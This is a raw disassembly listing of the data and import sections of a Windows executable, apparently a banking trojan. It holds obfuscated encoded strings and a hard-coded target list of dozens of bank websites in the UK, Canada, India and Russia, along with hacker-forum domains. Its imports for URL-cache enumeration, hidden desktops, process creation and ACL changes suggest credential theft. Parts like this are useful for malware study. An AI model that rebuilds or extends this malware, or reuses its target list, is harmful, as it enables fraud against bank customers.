word_4470EA dw 1B2Bh ; DATA XREF: sub_405F5E+1C9�o
dd 0C1A1E06h, 391E0C27h, 0C0A061Bh
db 2 dup(1Ah), 0
aG55 db 'G-,/(<%=5:&/=>(;,5$',0 ; DATA XREF: sub_405F5E+1B7�o
db 0Ah
dd 61A061Bh, 3E351D0Fh, 60D0700h, 2A351A1Eh, 0C1B1B1Ch
dd 0C3F1D07h, 6001A1Bh, 112C3507h, 1B060519h, 2B351B0Ch
dd 1A1E061Bh, 1E0C270Ch, 0A061B39h, 1A1A0Ch
dword_447148 dd 3D2F263Ah, 2C3B283Eh, 5063935h, 0C000A00h, 24351Ah
; DATA XREF: sub_405F5E+D8�o
dd 1A061B0Ah, 351D0F06h, 0D07003Eh, 351A1E06h, 1B1B1C2Ah
dd 3F1D070Ch, 1A1B0Ch, 20350706h, 1B0C1D07h, 491D0C07h
dd 1D1D0C3Ah, 1A0E0700h, 7063335h, 4C351A0Ch
db 1Ch, 0
aX_yx db 'X_YX',0 ; DATA XREF: sub_405F5E+76�o
; sub_405F5E+A4�o ...
a5 db ':&/=>(;,5$',0 ; DATA XREF: sub_405F5E+50�o
dw 1B0Ah
dd 0F061A06h, 3E351Dh, 1E060D07h, 1C2A351Ah, 70C1B1Bh
dd 1B0C3F1Dh, 706001Ah, 1D072035h, 0C071B0Ch, 0C3A491Dh
dd 7001D1Dh, 33351A0Eh, 1A0C0706h, 1C4C35h
dword_4471E0 dd 1D014655h, 570504hdword_4471E8 dd 60B4655h, 57100Dhdword_4471F0 dd 0A1A4655h, 1D19001Bh db 57h, 0
word_4471FA dw 0C1Ah ; DATA XREF: sub_405636+7DD�o
dd 4003D1Dh, 1D1C060Ch, 1A4C4B41h, 454B4041h, 52401C4Ch
db 0
byte_447211 db 14h, 0 ; DATA XREF: sub_405636+7AB�o
byte_447213 db 0Dh ; DATA XREF: sub_405636+76F�o
dd 41C0A06h, 471D070Ch, 1A471A4Ch, 40B1Ch, 5240411Dh
db 0
byte_447229 db 0Fh, 1Ch, 7 ; DATA XREF: sub_405636+738�o
dd 6001D0Ah, 1A4C4907h, 124041h
dword_447238 dd 474C0A4Ch db 5Bh, 1Ch, 0
byte_44723F db 55h ; DATA XREF: sub_405636+6C7�o
dd 1B0A1Ah, 571D19h
dword_447248 dd 60F4655h, 57041Bhdword_447250 dd 19070055h, 1D491D1Ch, 540C1910h, 0B1C1A4Bh, 4B1D0004h
; DATA XREF: sub_405636+68D�o
dd 5081F49h, 4E540C1Ch
db 4Eh, 57h, 0
byte_44726F db 4Ch ; DATA XREF: sub_405636+550�o
db 1Ah, 15h, 0
byte_447273 db 55h ; DATA XREF: sub_405636+46A�o
; sub_405636+5FD�o
dd 1C190700h, 101D491Dh, 4B540C19h, 1D000D0Ch, 81F494Bh
dd 540C1C05h, 4E1A4C4Eh, 4080749h, 4C4E540Ch, 4E1C4C1Ah
dd 1B0B5557h, 636457h
dword_4472A4 dd 19070055h, 1D491D1Ch, 540C1910h, 0D0C4Bh, 1F494B1Dh
; DATA XREF: sub_405636+316�o
dd 0C1C0508h, 1C4C4E54h, 807494Eh, 4E540C04h, 55574E08h
dd 64571B0Bh
db 63h, 0
word_4472D2 dw 0F55h ; DATA XREF: sub_405636+2C0�o
dd 49041B06h, 1D0A08h, 4B540706h, 494B1A4Ch, 11D0C04h
dd 4B540D06h, 3D3A2639h, 807494Bh, 4B540C04h, 574B1A4Ch
db 0
byte_4472FD db 0Fh, 4Ch, 47h ; DATA XREF: sub_405636+282�o
db 5Ah, 1Ch, 0
byte_447303 db 55h ; DATA XREF: sub_405636+252�o
dd 100D060Bh
db 57h, 0
word_44730A dw 4655h ; DATA XREF: sub_405636+221�o
dd 0D080C01h
db 57h, 0
aMicrosoftCorp db 'MicroSoft-Corp',0 ; DATA XREF: sub_405636+1E2�o
; sub_4062A9+2F8�o
byte_447321 db 55h, 1Dh, 0 ; DATA XREF: sub_405636+1D2�o
dd 570C051Dh, 1C4C1A4Ch, 1D4655h, 570C051Dh
db 0
byte_447335 db 55h, 1, 0Ch ; DATA XREF: sub_405636+1AF�o
dd 570D08h
dword_44733C dd 41D0155h db 5, 57h, 0
byte_447343 db 47h ; DATA XREF: sub_405636+15D�o
dd 41D01h
dword_447348 dd 0A4C1A4Ch ; sub_405636+3E8�o
db 4Ch, 0Ah, 0
off_44734F dd offset byte_434743 ; DATA XREF: sub_40538B+BA�o
byte_447353 db 56h ; DATA XREF: sub_40538B+43�o
db 0
aSi db 'ؑ',0 ; DATA XREF: sub_405004+174�o
aSi_0 db 'ؑ',0 ; DATA XREF: sub_405004+113�o
aEXeXeXeXeXeXe db 'ͅϕϕϕϕϕϕ',0 ; DATA XREF: sub_405004+B5�o
aOSi db 'ؑ',0 ; DATA XREF: sub_405004+60�o
aJalsac_0 db 'ʆ',0 ; DATA XREF: sub_404DE3+131�o
aJalsac db 'ن',0 ; DATA XREF: sub_404DE3+104�o
aGkls db 'ʃ',0 ; DATA XREF: sub_404DE3+C2�o
aR db 'ʐ',0 ; DATA XREF: sub_404DE3+9A�o
aZ db 'ʇ',0 ; DATA XREF: sub_404DE3+6D�o
aM db 'ʌ',0 ; DATA XREF: sub_404DE3+45�o
aM_0 db 'ٌ',0 ; DATA XREF: sub_404DE3+A�o
aR_0 db 'ِ',0 ; DATA XREF: sub_404D86+25�o
aZ_1 db 'ه',0 ; DATA XREF: sub_404D70+2�o
aZc db 'ه',0 ; DATA XREF: sub_404BA0+18D�o
asc_4473C1 db '',0 ; DATA XREF: sub_404970+1E0�o
asc_4473C6 db '',0 ; DATA XREF: sub_404970:loc_4049EC�o
aSq db '',0 ; DATA XREF: sub_40470D+245�o
; sub_404DE3+167�o
aJJJsq db '',0 ; DATA XREF: sub_40470D+191�o
aUdcJJJR db '',0 ; DATA XREF: sub_40470D+C6�o
asc_4473EB db '',0 ; DATA XREF: sub_40470D+69�o
aCJ db '',0 ; DATA XREF: sub_40470D+4�o
; sub_404970+BA�o ...
asc_4473F4 db '',0 ; DATA XREF: sub_404657+89�o
aBlind_user db 'blind_user',0 ; DATA XREF: sub_404502+57�o
; sub_404590+C�o
aUGU db 'œϣœ',0 ; DATA XREF: sub_40439D+8A�o
aMppraAdemUOxma db 'ڌꠄœގꠉœꠄœގ',0
; DATA XREF: sub_404313+73�o
aGpnnbodGpn db '',0 ; DATA XREF: sub_404313+1D�o
aUGpnnbodRij db 'œΐ',0 ; DATA XREF: sub_4041B6+14C�o
aUSumjdmSVbf db 'œ٘',0 ; DATA XREF: sub_4041B6+12C�o
aGndEse db '΅',0 ; DATA XREF: sub_4041B6+F0�o
aUGndRij db 'œΐ',0 ; DATA XREF: sub_4041B6+D0�o
aUSumjdmofVbf db 'œ',0 ; DATA XREF: sub_4041B6+B0�o
word_447496 dw 320Eh ; DATA XREF: sub_403D18+354�o
dd 3C2A293Bh, 1001382Fh, 322F3E34h, 293B322Eh, 33340A01h
dd 2E2A3239h, 2F281E01h, 2933382Fh, 2E2F380Bh, 1333234h
dd 3138350Eh, 2F380E31h, 383E342Bh, 38373F12h, 3819293Eh
dd 11243C31h, 393C32h
dword_4474DC dd 2F3C2D1Ch, 33383029h db 29h, 0
word_4474E6 dw 3509h ; DATA XREF: sub_403D18:loc_404030�o
dd 393C382Fh, 103A3334h, 31383932h
db 0
byte_4474F5 db 0 ; DATA XREF: sub_403D18+2ED�o
; sub_405F5E+2EE�o ...
word_4474F6 dw 111Eh ; DATA XREF: sub_403D18+2C3�o
dd 119140Eh, 14012E78h, 322F0D33h, 2F380E3Eh, 6E2F382Bh
db 6Fh, 0
word_44750E dw 2E78h ; DATA XREF: sub_403D18+234�o
dd 732E7801h, 313139h
dword_447518 dd 696D7826h, 696D7805h, 6D787005h, 78700569h, 7005696Dh
; DATA XREF: sub_403D18+2C�o
dd 5696D78h, 696D7870h, 2 dup(696D7805h)
db 5, 20h, 0
byte_44753F db 7Dh ; DATA XREF: sub_403B8E+132�o
db 0
byte_447541 db 78h, 2Eh, 1 ; DATA XREF: sub_403B8E+56�o
aX_s88 db 'x.s8%8',0
byte_44754B db 78h ; DATA XREF: sub_403A7B+BA�o
dd 5656Dh
byte_447550 db 0FCh, 0 ; DATA XREF: sub_403883+4F�o
; .text:00403952�o ...
word_447552 dw 6Fh ; DATA XREF: sub_403780+30�o
byte_447554 db 0Fh, 0 ; DATA XREF: sub_40369B+A4�o
word_447556 dw 423Eh ; DATA XREF: sub_4034C6+67�o
; sub_40355C+47�o
db 0
aChevychasebank db 'chevychasebank.com',0 ; DATA XREF: .data:0043C1DC�o
aGronxplanets_r db 'gronxplanets.ru',0 ; DATA XREF: .data:0043C1D8�o
aWww_mdmbank_ru db 'www.mdmbank.ru',0 ; DATA XREF: .data:0043C1D4�o
aFethard_biz db 'fethard.biz',0 ; DATA XREF: .data:0043C1D0�o
aRoyalbank_com db 'royalbank.com',0 ; DATA XREF: .data:0043C1CC�o
aSecuritylab_ru db 'securitylab.ru',0 ; DATA XREF: .data:0043C1C8�o
aTatNeftbank_ru db 'tat-neftbank.ru',0 ; DATA XREF: .data:0043C1C4�o
aSeclab_ru db 'seclab.ru',0 ; DATA XREF: .data:0043C1C0�o
aOpenbank_com db 'openbank.com',0 ; DATA XREF: .data:0043C1BC�o
aGutabank_ru db 'gutabank.ru',0 ; DATA XREF: .data:0043C1B8�o
aWww_b2bTrust_c db 'www.b2b-trust.com',0 ; DATA XREF: .data:0043C1B4�o
aGrepwareFacili db 'grepware-facility.ru',0 ; DATA XREF: .data:0043C1B0�o
aWww_uralsib_ru db 'www.uralsib.ru',0 ; DATA XREF: .data:0043C1AC�o
a53bank_com db '53bank.com',0 ; DATA XREF: .data:0043C1A8�o
aWww_nbc_caInde db 'www.nbc.ca/index.php',0 ; DATA XREF: .data:0043C1A4�o
aTotallyfreeban db 'totallyfreebanking.com',0 ; DATA XREF: .data:0043C1A0�o
aBarclays_com db 'barclays.com',0 ; DATA XREF: .data:0043C19C�o
aWww_lbcdirect_ db 'www.lbcdirect.laurentianbank.ca/index.php',0
; DATA XREF: .data:0043C198�o
aKidosBank_ru db 'kidos-bank.ru',0 ; DATA XREF: .data:0043C194�o
aYambo_biz db 'yambo.biz',0 ; DATA XREF: .data:0043C190�o
aProrat_net db 'prorat.net',0 ; DATA XREF: .data:0043C18C�o
aWww1_hsbc_caIn db 'www1.hsbc.ca/index.php',0 ; DATA XREF: .data:0043C188�o
aWww_ovk_ru db 'www.ovk.ru',0 ; DATA XREF: .data:0043C184�o
aWww_rbc_com db 'www.rbc.com',0 ; DATA XREF: .data:0043C180�o
aMasterX_comFor db 'master-x.com/forum/',0 ; DATA XREF: .data:0043C17C�o
aWww_allahabadb db 'www.allahabadbank.com',0 ; DATA XREF: .data:0043C178�o
aOnlineBusiness db 'online-business.lloydstsb.co.uk',0 ; DATA XREF: .data:0043C174�o
aMyonlineaccoun db 'myonlineaccounts2.abbeynational.co.uk',0 ; DATA XREF: .data:0043C170�o
aWww_absolutban db 'www.absolutbank.ru',0 ; DATA XREF: .data:0043C16C�o
aKavkazcenter_c db 'kavkazcenter.com/russ',0 ; DATA XREF: .data:0043C168�o
aWww_netmagiste db 'www.netmagister.com',0 ; DATA XREF: .data:0043C164�o
aWww_kmb_ru db 'www.kmb.ru',0 ; DATA XREF: .data:0043C160�o
aWww_spyinstruc db 'www.spyinstructors.com',0 ; DATA XREF: .data:0043C15C�o
aAcroleinHawk_r db 'acrolein-hawk.rubanking.halifax-online.co.uk',0
; DATA XREF: .data:0043C158�o
aWww_icbank_ru db 'www.icbank.ru',0 ; DATA XREF: .data:0043C154�o
aWww_bankofindi db 'www.bankofindia.com',0 ; DATA XREF: .data:0043C150�o
aPizdabolInc_ru db 'pizdabol-inc.ru',0 ; DATA XREF: .data:0043C14C�o
aWww_sbrf_ru db 'www.sbrf.ru',0 ; DATA XREF: .data:0043C148�o
aWww_candidatev db 'www.candidateverifier.com/index.php',0 ; DATA XREF: .data:0043C144�o
aWww_worldbank_ db 'www.worldbank.org/index.php',0 ; DATA XREF: .data:0043C140�o
aDigitalRelaxkg db 'digital-relaxkgb.ru',0 ; DATA XREF: .data:0043C13C�o
aAsmworm_com db 'asmworm.com',0 ; DATA XREF: .data:0043C134�o
aAtmacasoft_com db 'atmacasoft.com',0 ; DATA XREF: .data:0043C130�o
aCrutop_nuVbu_1 db 'crutop.nu/vbulletin/showthread.php',0 ; DATA XREF: .data:0043C12C�o
aWww_uniastrum_ db 'www.uniastrum.ru',0 ; DATA XREF: .data:0043C128�o
aCrutop_nuVbu_0 db 'crutop.nu/vbulletin/forumdisplay.php',0 ; DATA XREF: .data:0043C124�o
aWww_mmbank_ru db 'www.mmbank.ru',0 ; DATA XREF: .data:0043C120�o
aCrutop_nuVbull db 'crutop.nu/vbulletin/',0 ; DATA XREF: .data:0043C11C�o
aAlfabank_ru db 'alfabank.ru',0 ; DATA XREF: .data:0043C118�o
aHyperSpaceFuel db 'hyper-space-fuel.ru',0 ; DATA XREF: .data:0043C114�o
aWww_cwbank_com db 'www.cwbank.com',0 ; DATA XREF: .data:0043C110�o
aWww_vtb_ru db 'www.vtb.ru',0 ; DATA XREF: .data:0043C10C�o
aWww_cibc_com db 'www.cibc.com',0 ; DATA XREF: .data:0043C108�o
aWww_bankofmadu db 'www.bankofmadura.com',0 ; DATA XREF: .data:0043C104�o
aWww_bmo_com db 'www.bmo.com',0 ; DATA XREF: .data:0043C100�o
aWww_bankBanque db 'www.bank-banque-canada.ca/index.php',0 ; DATA XREF: .data:0043C0FC�o
aWww_masterbank db 'www.masterbank.ru',0 ; DATA XREF: .data:0043C0F8�o
aEbookfinaltras db 'ebookfinaltrash.ru',0 ; DATA XREF: .data:0043C0F4�o
aMasterX_com db 'master-x.com',0 ; DATA XREF: .data:0043C0F0�o
aWww_bbin_ru db 'www.bbin.ru',0 ; DATA XREF: .data:0043C0EC�o
aOlb2_nationet_ db 'olb2.nationet.com',0 ; DATA XREF: .data:0043C0E8�o
aWelcome3_smile db 'welcome3.smile.co.uk',0 ; DATA XREF: .data:0043C0E4�o
aWww_baltbank_r db 'www.baltbank.ru',0 ; DATA XREF: .data:0043C0E0�o
aNew_egg_com db 'new.egg.com',0 ; DATA XREF: .data:0043C0DC�o
aProdexteam_n_1 db 'prodexteam.netcrutop.nu',0 ; DATA XREF: .data:0043C0D8�o
aWww_proxySocks db 'www.proxy-socks.net',0 ; DATA XREF: .data:0043C0D4�o
; .data:0043C138�o
aWww_cbr_ru db 'www.cbr.ru',0 ; DATA XREF: .data:0043C0D0�o
aProdexteam_n_0 db 'prodexteam.net/main.htm',0 ; DATA XREF: .data:0043C0CC�o
aProdexteam_net db 'prodexteam.net',0 ; DATA XREF: .data:0043C0C8�o
aChechenpress_i db 'chechenpress.info',0 ; DATA XREF: .data:0043C0C4�o
aSiliconfirewar db 'siliconfireware.ru',0 ; DATA XREF: .data:off_43C0C0�o
db '://',0
align 4
dword_447A98 dd 332C4425h, 11D026CBh, 0C00083B4h, 1901D94Fhdword_447AA8 dd 3050F1FFh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; sub_406D91+997�o
dword_447AB8 dd 3050F1F7h, 11CF98B5h, 0AA0082BBh, 0BCEBD00hdword_447AC8 dd 332C4427h, 11D026CBh, 0C00083B4h, 1901D94Fhdword_447AD8 dd 85CB6900h, 11CF4D95h, 80000C96h, 85EEF4C7hdword_447AE8 dd 2 dup(0) dd 0C0h, 46000000h
dword_447AF8 dd 0D30C1661h, 11D0CDAFh, 0C0003E8Ah, 6EE2C94Fhdword_447B08 dd 10h dup(0) ; sub_40BA60:loc_40BA7A�o ...
dword_447B48 dd 0 ; sub_40BA04:loc_40BA46�o ...
dd 0Fh dup(0)
dword_447B88 dd 0 ; sub_40BB69+825�r
dword_447B8C dd 0 ; sub_40BB69+82C�r
dword_447B90 dd 0 ; sub_40BB69+834�r
dword_447B94 dd 0 ; sub_40BB69+83C�r
align 800h
_data ends
; Section 4. (virtual address 00048000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00048000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata segment para public 'DATA' use32
assume cs:_idata
;org 448000h
off_448000 dd offset dword_44810C ; DATA XREF: .idata:00448E00�o
dd 2 dup(0)
dd offset dword_44810C
dd offset dword_44810C
off_448014 dd offset dword_44811C ; DATA XREF: .idata:00448E10�o
; .idata:00448E14�o
align 10h
dd offset dword_44811C
dd offset dword_44811C
off_448028 dd offset dword_448134 ; DATA XREF: .idata:00448E24�o
; .idata:00448E28�o ...
dd 2 dup(0)
dd offset dword_448134
dd offset dword_448134
off_44803C dd offset dword_448214 ; DATA XREF: .idata:00448E44�o
; .idata:00448E48�o ...
dd 2 dup(0)
dd offset dword_448214
dd offset dword_448214
off_448050 dd offset dword_448290 ; DATA XREF: .idata:00448F28�o
; .idata:00448F2C�o ...
dd 2 dup(0)
dd offset dword_448290
dd offset dword_448290
off_448064 dd offset dword_4482AC ; DATA XREF: .idata:00448FA8�o
; .idata:00448FAC�o ...
align 10h
dd offset dword_4482AC
dd offset dword_4482AC
off_448078 dd offset dword_4482E8 ; DATA XREF: .idata:00448FCC�o
; .idata:00448FD0�o ...
dd 2 dup(0)
dd offset dword_4482E8
dd offset dword_4482E8
off_44808C dd offset dword_448338 ; DATA XREF: .idata:0044900C�o
; .idata:00449010�o ...
dd 2 dup(0)
dd offset dword_448338
dd offset dword_448338
dd 1Ah dup(0)
dd 48574h
dword_44810C dd 2 dup(0) ; .idata:0044800C�o ...
dd 48588h, 485A4h
dword_44811C dd 2 dup(0) ; .idata:00448020�o ...
dd 485C0h, 485D4h, 485E8h, 485F8h
dword_448134 dd 2 dup(0) ; .idata:00448034�o ...
dd 4860Ch, 4861Ch, 4862Ch, 48648h, 4865Ch, 48674h, 4868Ch
dd 4869Ch, 486ACh, 486BCh, 486D4h, 486E8h, 486FCh, 48710h
dd 48728h, 48738h, 48748h, 48758h, 48768h, 48778h, 48790h
dd 487A8h, 487BCh, 487D0h, 487E4h, 487FCh, 48814h, 48824h
dd 48834h, 48848h, 48858h, 48864h, 48874h, 48880h, 48890h
dd 488A0h, 488ACh, 488B8h, 488C8h, 488D8h, 488ECh, 488FCh
dd 48904h, 48918h, 48928h, 48938h, 48948h, 48960h, 4896Ch
dd 48978h, 48988h, 48994h, 489A0h, 489B4h
dword_448214 dd 2 dup(0) ; .idata:00448048�o ...
dd 489C4h, 489D8h, 489ECh, 489FCh, 48A0Ch, 48A18h, 48A28h
dd 48A34h, 48A4Ch, 48A5Ch, 48A68h, 48A74h, 48A84h, 48A94h
dd 48AA8h, 48ABCh, 48AD0h, 48AE4h, 48AF8h, 48B0Ch, 48B20h
dd 48B2Ch, 48B3Ch, 48B50h, 48B64h, 48B74h, 48B88h, 48B98h
dd 48BA8h
dword_448290 dd 2 dup(0) ; .idata:0044805C�o ...
dd 48BBCh, 48BD0h, 48BE0h, 48BF0h, 48C08h
dword_4482AC dd 2 dup(0) ; .idata:00448070�o ...
dd 48C18h, 48C2Ch, 48C44h, 48C58h, 48C68h, 48C78h, 48C8Ch
dd 48CA0h, 48CB4h, 48CC8h, 48CDCh, 48CF8h, 48D10h
dword_4482E8 dd 2 dup(0) ; .idata:00448084�o ...
dd 48D2Ch, 48D34h, 48D44h, 48D50h, 48D5Ch, 48D64h, 48D6Ch
dd 48D78h, 48D84h, 48D90h, 48D98h, 48DA0h, 48DACh, 48DB8h
dd 48DC0h, 48DCCh, 48DD8h, 48DE4h
dword_448338 dd 2 dup(0) ; .idata:00448098�o ...
dword_448340 dd 77124C05h dd 2 dup(0)
dword_44834C dd 42C2DE3Dh ; resolved to->WININET.FindFirstUrlCacheEntryAdword_448350 dd 42C2E399h ; resolved to->WININET.FindNextUrlCacheEntryA dd 2 dup(0)
dword_44835C dd 774FFAC3h dword_448360 dd 7750CB9Ch dword_448364 dd 77502A37h dword_448368 dd 774FEE36h dd 2 dup(0)
dword_448374 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileAdword_448378 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_44837C dd 7C8329D9h ; resolved to->KERNEL32.ExpandEnvironmentStringsAdword_448380 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_448384 dd 7C809920h ; resolved to->KERNEL32.GetCurrentProcessIddword_448388 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadIddword_44838C dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_448390 dd 7C831C45h ; resolved to->KERNEL32.GetFileTimedword_448394 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_448398 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_44839C dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_4483A0 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_4483A4 dd 7C80ABC1h ; resolved to->KERNEL32.GetProcessHeapdword_4483A8 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryAdword_4483AC dd 7C809B47h ; resolved to->KERNEL32.CloseHandledword_4483B0 dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathAdword_4483B4 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_4483B8 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_4483BC dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExAdword_4483C0 dd 7C821BA5h ; resolved to->KERNEL32.GetVolumeInformationAdword_4483C4 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_4483C8 dd 7C8360A9h ; resolved to->KERNEL32.GlobalAddAtomAdword_4483CC dd 7C830BBBh ; resolved to->KERNEL32.GlobalDeleteAtomdword_4483D0 dd 7C8360C3h ; resolved to->KERNEL32.GlobalFindAtomAdword_4483D4 dd 7C8310F2h ; resolved to->KERNEL32.GlobalMemoryStatusdword_4483D8 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrementdword_4483DC dd 7C809E01h ; resolved to->KERNEL32.IsBadReadPtrdword_4483E0 dd 7C809E79h ; resolved to->KERNEL32.IsBadWritePtrdword_4483E4 dd 7C813093h ; resolved to->KERNEL32.IsDebuggerPresentdword_4483E8 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_4483EC dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_4483F0 dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_4483F4 dd 7C80992Fh ; resolved to->KERNEL32.LocalFreedword_4483F8 dd 7C80EA1Bh ; resolved to->KERNEL32.OpenMutexAdword_4483FC dd 7C8309E1h ; resolved to->KERNEL32.OpenProcessdword_448400 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_448404 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_448408 dd 7C90311Bh ; resolved to->NTDLL.RtlZeroMemorydword_44840C dd 7C801A24h ; resolved to->KERNEL32.CreateFileAdword_448410 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointerdword_448414 dd 7C831CB8h ; resolved to->KERNEL32.SetFileTimedword_448418 dd 7C802442h ; resolved to->KERNEL32.Sleepdword_44841C dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_448420 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_448424 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_448428 dd 7C80B9D1h ; resolved to->KERNEL32.VirtualQuerydword_44842C dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiBytedword_448430 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_448434 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_448438 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_44843C dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenAdword_448440 dd 7C809A09h ; resolved to->KERNEL32.lstrlenWdword_448444 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_448448 dd 7C810637h ; resolved to->KERNEL32.CreateThread dd 2 dup(0)
dword_448454 dd 7E41F642h ; resolved to->USER32.CallWindowProcAdword_448458 dd 7E43212Bh ; resolved to->USER32.GetWindowTextAdword_44845C dd 7E41B6D4h ; resolved to->USER32.GetWindowRectdword_448460 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_448464 dd 7E41BC7Dh ; resolved to->USER32.GetWindowdword_448468 dd 7E42F420h ; resolved to->USER32.GetClassNameAdword_44846C dd 7E41DA60h ; resolved to->USER32.SetFocusdword_448470 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_448474 dd 7E41EF69h ; resolved to->USER32.LoadCursorAdword_448478 dd 7E418C2Eh ; resolved to->USER32.SetTimerdword_44847C dd 7E4208CEh ; resolved to->USER32.LoadIconAdword_448480 dd 7E45058Ah ; resolved to->USER32.MessageBoxAdword_448484 dd 7E42E002h ; resolved to->USER32.GetMessageAdword_448488 dd 7E41945Dh ; resolved to->USER32.GetWindowLongAdword_44848C dd 7E41D60Dh ; resolved to->USER32.SetWindowLongAdword_448490 dd 7E455BD7h ; resolved to->USER32.CreateDesktopAdword_448494 dd 7E42E8D1h ; resolved to->USER32.SetThreadDesktopdword_448498 dd 7E419A51h ; resolved to->USER32.GetThreadDesktopdword_44849C dd 7E418BF6h ; resolved to->USER32.TranslateMessagedword_4484A0 dd 7E4196B8h ; resolved to->USER32.DispatchMessageAdword_4484A4 dd 7E41A8ADh ; resolved to->USER32.wsprintfAdword_4484A8 dd 7E42F383h ; resolved to->USER32.SendMessageAdword_4484AC dd 7E420A36h ; resolved to->USER32.RegisterClassAdword_4484B0 dd 7E42E1D1h ; resolved to->USER32.PostQuitMessagedword_4484B4 dd 7E41D8A4h ; resolved to->USER32.ShowWindowdword_4484B8 dd 7E41FF33h ; resolved to->USER32.CreateWindowExAdword_4484BC dd 7E41DAEAh ; resolved to->USER32.DestroyWindowdword_4484C0 dd 7E41DBECh ; resolved to->USER32.MoveWindowdword_4484C4 dd 7E41D4EEh ; resolved to->USER32.DefWindowProcA align 10h
dword_4484D0 dd 77F161D1h ; resolved to->GDI32.GetStockObjectdword_4484D4 dd 77F15E39h ; resolved to->GDI32.SetBkColordword_4484D8 dd 77F15D87h ; resolved to->GDI32.SetTextColordword_4484DC dd 77F1D991h ; resolved to->GDI32.CreateBrushIndirectdword_4484E0 dd 77F3B730h ; resolved to->GDI32.CreateFontA dd 2 dup(0)
dword_4484EC dd 77DD7753h ; resolved to->ADVAPI32.OpenProcessTokendword_4484F0 dd 77DD7B76h ; resolved to->ADVAPI32.GetTokenInformationdword_4484F4 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_4484F8 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKeydword_4484FC dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExAdword_448500 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_448504 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_448508 dd 77DF08D5h ; resolved to->ADVAPI32.GetSecurityInfodword_44850C dd 77DF087Fh ; resolved to->ADVAPI32.SetSecurityInfodword_448510 dd 77E215D9h ; resolved to->ADVAPI32.SetEntriesInAclAdword_448514 dd 77DFD4B0h ; resolved to->ADVAPI32.GetSidIdentifierAuthoritydword_448518 dd 77DF9839h ; resolved to->ADVAPI32.GetSidSubAuthoritydword_44851C dd 77DF986Bh ; resolved to->ADVAPI32.GetSidSubAuthorityCount dd 2 dup(0)
dword_448528 dd 73D96FEBh dword_44852C dd 73D91C28h dword_448530 dd 73D92B86h dword_448534 dd 73D9A3B0h dword_448538 dd 73D9B9A2h dword_44853C dd 73D91F60h dword_448540 dd 73D9D320h dword_448544 dd 73D9D340h dword_448548 dd 73D9D5E0h dword_44854C dd 73D9242Ch dword_448550 dd 73D9DBAFh dword_448554 dd 73D92226h dword_448558 dd 73D9E5C5h dword_44855C dd 73D9DBA2h dword_448560 dd 73D9E61Eh dword_448564 dd 73D9E65Ch dword_448568 dd 73D9E69Ch dword_44856C dd 73D9F24Ch dd 0
dd 79530046h, 6C6C4173h, 7453636Fh, 676E6972h, 0
dd 69460015h, 6946646Eh, 55747372h, 61436C72h, 45656863h
dd 7972746Eh, 41h, 6946001Ch, 654E646Eh, 72557478h, 6361436Ch
dd 6E456568h, 41797274h, 0
dd 6F43006Ah, 61657243h, 6E496574h, 6E617473h, 6563h, 4C43007Ch
dd 46444953h, 536D6F72h, 6E697274h, 67h, 6F430058h, 74696E49h
dd 696C6169h, 657Ah, 6F43005Bh, 6E696E55h, 61697469h, 657A696Ch
dd 0
dd 6544006Bh, 6574656Ch, 656C6946h, 41h, 7845009Bh, 72507469h
dd 7365636Fh, 73h, 7845009Dh, 646E6170h, 69766E45h, 6D6E6F72h
dd 53746E65h, 6E697274h, 417367h, 654700EDh, 6D6F4374h
dd 646E616Dh, 656E694Ch, 41h, 65470112h, 72754374h, 746E6572h
dd 636F7250h, 49737365h, 64h, 65470115h, 72754374h, 746E6572h
dd 65726854h, 64496461h, 0
dd 6547012Fh, 6C694674h, 7A695365h, 65h, 65470131h, 6C694674h
dd 6D695465h, 65h, 6547013Ch, 73614C74h, 72724574h, 726Fh
dd 65470147h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
dd 65470149h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 65470167h
dd 6F725074h, 64644163h, 73736572h, 0
dd 6547016Ah, 6F725074h, 73736563h, 70616548h, 0
dd 65470188h, 73795374h, 446D6574h, 63657269h, 79726F74h
